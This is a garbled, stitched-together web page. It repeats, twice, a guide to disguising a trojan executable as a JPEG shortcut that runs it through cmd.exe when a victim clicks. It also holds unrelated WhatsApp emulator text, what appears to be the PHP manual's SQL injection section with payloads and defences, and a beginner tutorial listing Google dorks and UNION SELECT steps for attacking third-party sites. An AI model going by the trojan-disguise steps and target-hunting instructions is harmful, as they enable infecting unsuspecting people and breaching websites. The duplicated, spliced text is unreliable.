How to hide and convert .exe into .jpeg-->
.jpg)
1. Firstly, create a new folder and make sure that the options ‘show hidden files’ is checked and ‘hide extensions for
known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on
your pc.
2. Paste a copy of your leviticus on the new created folder. let’s say it’s called leviticus.exe
(that’s why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this leviticus.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the leviticus renamed picture.jpeg) so u
have to write this: C:WINDOWSsystem32cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you
gotta write C:WINDOWSsystem32cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the
leviticus will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a
new window will pop up and u have to write this: %SystemRoot%system32SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection
from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want
considering the person and the knowledge they have on this matter.
15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the leviticus to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first.
If you set hidden properties to the leviticus (picture.jpeg) then u don’t have to bother with this detail but I’m warning
you, the hidden file will always show up inside of a zip file or rar.
16. So the best way to send these files together to someone is compress them into zip or rar.
17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the
shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to
open it.
To use the Android version of WhatsApp, either you need an Android phone or a well running Android emulator or SDK. There are so many emulators around, but I find BlueStacks App Player a real treat. It is now available for free and one can install the same on Windows PC, Laptops or Mac OS as well. It is a very smooth emulator with full screen ability. You can install and run Android apps from Google Play Store by signing up with existing Google Account.
YouWave is another emulator for running Android applications on PC.
If it happened, then the script would present a superuser access to him.
Note that 0; is to supply a valid offset to the
original query and to terminate it.
If this query (playing with the ' and
--) were assigned to one of the variables used in
$query, the query beast awakened.
MSSQL Server executes the SQL statements in the batch including a command
to add a new user to the local accounts database. If this application
were running as sa and the MSSQLSERVER service is
running with sufficient privileges, the attacker would now have an
account with which to access this machine.
Image courtesy of » xkcd
known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on
your pc.
2. Paste a copy of your leviticus on the new created folder. let’s say it’s called leviticus.exe
(that’s why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this leviticus.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the leviticus renamed picture.jpeg) so u
have to write this: C:WINDOWSsystem32cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you
gotta write C:WINDOWSsystem32cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the
leviticus will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a
new window will pop up and u have to write this: %SystemRoot%system32SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection
from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want
considering the person and the knowledge they have on this matter.
15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the leviticus to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first.
If you set hidden properties to the leviticus (picture.jpeg) then u don’t have to bother with this detail but I’m warning
you, the hidden file will always show up inside of a zip file or rar.
16. So the best way to send these files together to someone is compress them into zip or rar.
17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the
shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to
open it.
Download whatsApp for Windows
YouWave is another emulator for running Android applications on PC.
SQL Injection ¶
Many web developers are unaware of how SQL queries can be tampered with,
and assume that an SQL query is a trusted command. It means that SQL
queries are able to circumvent access controls, thereby bypassing standard
authentication and authorization checks, and sometimes SQL queries even
may allow access to host operating system level commands.
Direct SQL Command Injection is a technique where an attacker creates or
alters existing SQL commands to expose hidden data, or to override valuable
ones, or even to execute dangerous system level commands on the database
host. This is accomplished by the application taking user input and
combining it with static parameters to build an SQL query. The following
examples are based on true stories, unfortunately.
Owing to the lack of input validation and connecting to the database on
behalf of a superuser or the one who can create users, the attacker
may create a superuser in your database.
Example #1
Splitting the result set into pages ... and making superusers
(PostgreSQL)
Normal users click on the 'next', 'prev' links where the $offset
is encoded into the URL. The script expects that the incoming
$offset is a decimal number. However, what if someone tries to
break in by appending a urlencode()'d form of the
following to the URL
<?php
$offset = $argv[0]; // beware, no input validation!$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";$result = pg_query($conn, $query);?>
0;
insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)
select 'crack', usesysid, 't','t','crack'
from pg_shadow where usename='postgres';
--
Note:
It is common technique to force the SQL parser to ignore the rest of the query written by the developer with -- which is the comment sign in SQL.
A feasible way to gain passwords is to circumvent your search result pages.
The only thing the attacker needs to do is to see if there are any submitted variables
used in SQL statements which are not handled properly. These filters can be set
commonly in a preceding form to customize WHERE, ORDER BY,
LIMIT and OFFSET clauses in SELECT
statements. If your database supports the UNION construct,
the attacker may try to append an entire query to the original one to list
passwords from an arbitrary table. Using encrypted password fields is
strongly encouraged.
Example #2
Listing out articles ... and some passwords (any database server)
The static part of the query can be combined with another
SELECT statement which reveals all passwords:
<?php
$query = "SELECT id, name, inserted, size FROM products
WHERE size = '$size'";$result = odbc_exec($conn, $query);?>
' union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable; --
SQL UPDATE's are also susceptible to attack. These queries are
also threatened by chopping and appending an entirely new query to it. But
the attacker might fiddle with the SET clause. In this
case some schema information must be possessed to manipulate the query
successfully. This can be acquired by examining the form variable names, or
just simply brute forcing. There are not so many naming conventions for
fields storing passwords or usernames.
Example #3
From resetting a password ... to gaining more privileges (any database server)
But a malicious user sumbits the value
' or uid like'%admin% to $uid to
change the admin's password, or simply sets $pwd to
hehehe', trusted=100, admin='yes to gain more
privileges. Then, the query will be twisted:
<?php
$query = "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";?>
<?php// $uid: ' or uid like '%admin%$query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%';";// $pwd: hehehe', trusted=100, admin='yes$query = "UPDATE usertable SET pwd='hehehe', trusted=100, admin='yes' WHERE
...;";?>
A frightening example how operating system level commands can be accessed
on some database hosts.
Example #4 Attacking the database hosts operating system (MSSQL Server)
If attacker submits the value
a%' exec master..xp_cmdshell 'net user test testpass /ADD' --
to $prod, then the $query will be:
<?php
$query = "SELECT * FROM products WHERE id LIKE '%$prod%'";$result = mssql_query($query);?>
<?php
$query = "SELECT * FROM products
WHERE id LIKE '%a%'
exec master..xp_cmdshell 'net user test testpass /ADD' --%'";$result = mssql_query($query);?>
Note:
Some of the examples above is tied to a specific database server. This does not mean that a similar attack is impossible against other products. Your database server may be similarly vulnerable in another manner.
Avoidance Techniques ¶
While it remains obvious that an attacker must possess at least some
knowledge of the database architecture in order to conduct a successful
attack, obtaining this information is often very simple. For example,
if the database is part of an open source or other publicly-available
software package with a default installation, this information is
completely open and available. This information may also be divulged
by closed-source code - even if it's encoded, obfuscated, or compiled -
and even by your very own code through the display of error messages.
Other methods include the user of common table and column names. For
example, a login form that uses a 'users' table with column names
'id', 'username', and 'password'.
These attacks are mainly based on exploiting the code not being written
with security in mind. Never trust any kind of input, especially that
which comes from the client side, even though it comes from a select box,
a hidden input field or a cookie. The first example shows that such a
blameless query can cause disasters.
- Never connect to the database as a superuser or as the database owner. Use always customized users with very limited privileges.
- Use prepared statements with bound variables. They are provided by PDO, by MySQLi and by other libraries.
- Check if the given input has the expected data type. PHP has a wide range of input validating functions, from the simplest ones found in Variable Functions and in Character Type Functions (e.g. is_numeric(), ctype_digit() respectively) and onwards to the Perl compatible Regular Expressions support.
-
If the application waits for numerical input, consider verifying data with ctype_digit(), or silently change its type using settype(), or use its numeric representation by sprintf().Example #5 A more secure way to compose a query for paging
<?php
settype($offset, 'integer');$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";// please note %d in the format string, using %s would be meaningless$query = sprintf("SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET %d;",
$offset);?> - If the database layer doesn't support binding variables then quote each non numeric user supplied value that is passed to the database with the database-specific string escape function (e.g. mysql_real_escape_string(), sqlite_escape_string(), etc.). Generic functions like addslashes() are useful only in a very specific environment (e.g. MySQL in a single-byte character set with disabled NO_BACKSLASH_ESCAPES) so it is better to avoid them.
- Do not print out any database specific information, especially about the schema, by fair means or foul. See also Error Reporting and Error Handling and Logging Functions.
- You may use stored procedures and previously defined cursors to abstract data access so that users do not directly access tables or views, but this solution has another impacts.
Besides these, you benefit from logging queries either within your script
or by the database itself, if it supports logging. Obviously, the logging is unable
to prevent any harmful attempt, but it can be helpful to trace back which
application has been circumvented. The log is not useful by itself, but
through the information it contains. More detail is generally better than less.
Although
there are thousands of potential exploits designed to take advantage of
improperly designed websites, SQL injection is by far one of the most
effective, easiest, and far-reaching attacks. SQL injection attacks are
reported on a daily basis as more and more websites rely on data-driven
designs to create dynamic content for readers. These dynamic designs use
MySQL or another database system which probably relies on SQL; thus
making them vulnerable to attack.
SQL Injection Tutorial for Beginners
October 4, 2013 by 8 Comments
Although
there are thousands of potential exploits designed to take advantage of
improperly designed websites, SQL injection is by far one of the most
effective, easiest, and far-reaching attacks. SQL injection attacks are
reported on a daily basis as more and more websites rely on data-driven
designs to create dynamic content for readers. These dynamic designs use
MySQL or another database system which probably relies on SQL; thus
making them vulnerable to attack.
Since a SQL Injection attack works directly with databases,
you should have a basic understanding of SQL before getting started. SQL Database for Beginners is an excellent resource for those unfamiliar with Structured Query Language.
In this article, you will learn how to perform a SQL injection attack on a website. Please note that this article is for instructional purposes only.
If you successfully breach a website that does not belong to you, you
are in violation of federal law and could face incarceration and hefty
fines. That said, it is useful to understand how SQL injection works so
that you can prevent it from occurring on your own website.
What is a SQL Injection?
SQL injection is a code injection technique that exploits a
security vulnerability within the database layer of an application.
This vulnerability can be found when user input is incorrectly filtered
for string literal escape characters embedded in SQL statements.
Although SQL injection is most commonly used to attack
websites, it can also be used to attack any SQL database. Last year, a
security company reported that the average web application is attacked
at least four times per month by SQL injection techniques. Online
retailers receive more attacks than any other industry with an online
presence.
Picking a Target
The first step to performing a SQL injection attack is to
find a vulnerable website. This will probably be the most time-consuming
process in the entire attack. More and more websites are protecting
themselves from SQL injection meaning that finding a vulnerable target
could take quite some time.
One of the easiest ways to find vulnerable sites is known
as Google Dorking. In this context, a dork is a specific search query
that finds websites meeting the parameters of the advanced query you
input. Some examples of dorks you can use to find sites vulnerable to a
SQL injection attack include:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num= andinurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
Of course, there are many others as well. The key component
of these specialized search queries is that they all focus on websites
that rely on PHP scripts to generate dynamic content from a SQL database
somewhere on the backend of the server. You can learn more about
advanced Google search techniques in Unleash Google Search.
Remember that a SQL injection attack can work on any SQL
database, but PHP-based websites are usually your best targets because
they can be set up by just about anyone (i.e. WordPress) and often
contain lots of valuable information about customers within the database
you are attempting to hack.
However, just because Google pops up with a result using
these dorks does not mean it is vulnerable to attack. The next step is
to test each site until you find one that is vulnerable.
Navigate to one of the websites you found. For this
example, assume that one of the search results is
http://www.udemy.com/index.php?catid=1. To find out if this site is
vulnerable to SQL injection, simply add an apostrophe at the end of the
URL like this:
http://www.udemy.com/index.php?catid=1’
Press enter and see what the website does. If the page
returns a SQL error, the website is vulnerable to SQL injection. If the
page loads normally, it is not a candidate for SQL injection and you
should move on to the next URL in your list.
The errors you receive do not matter. As a general, if the
website returns any SQL errors, it should be vulnerable to SQL injection
techniques.
At this point, understanding SQL is even more important as
you will begin manipulating the database directly from the vulnerable
page. Practical SQL Skills is a solid resource for beginner and intermediate users.
Starting the Attack
After locating a vulnerable site, you need to figure out
how many columns are in the SQL database and how many of those columns
are able to accept queries from you. Append an “order by” statement to
the URL like this:
http://www.udemy.com/index.php?catid=1 order by 1
Continue to increase the number after “order by” until you
get an error. The number of columns in the SQL database is the highest
number before you receive an error. You also need to find out what
columns are accepting queries.
You can do this by appending an “Union Select” statement to the URL. A union select statement in this URL would look like this:
http://www.udemy.com/index.php?catid=-1 union select 1,2,3,4,5,6
There are a couple of things to note in this example.
Before the number one (after catid), you need to add a hyphen (-). Also,
the number of columns you discovered in the previous step is the number
of digits you put after the union select statement. For instance, if
you discovered that the database had 12 columns, you would append:
catid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12
The results of this query will be the column numbers that
are actually accepting queries from you. You can choose any one of these
columns to inject your SQL statements.
Exploiting the Database
At this point, you know what columns to direct your SQL
queries at and you can begin exploiting the database. You will be
relying on union select statements to perform most of the functions from
this point forward.
The tutorial ends here. You have learned how to select a
vulnerable website and detect which columns are responsive to your
queries. The only thing left to do is append SQL commands to the URL.
Some of the common functions you can perform at this point include
getting a list of the databases available, getting the current user,
getting the tables, and ultimately, the columns within these tables. The
columns are where all of the personal information is stored.
If you are unfamiliar with using SQL commands to finish the
exploit, you should study various commands before attempting a SQL
injection attack. You can also check out Website Hacking in Practice for additional tips and tricks.
Using this information, you can search for vulnerabilities
within your own websites and perform penetration testing for others.
Remember that what you do with this information is solely your
responsibility. Hacking is a lot of fun – but it doesn’t mean you have
to break the law to have a good time.
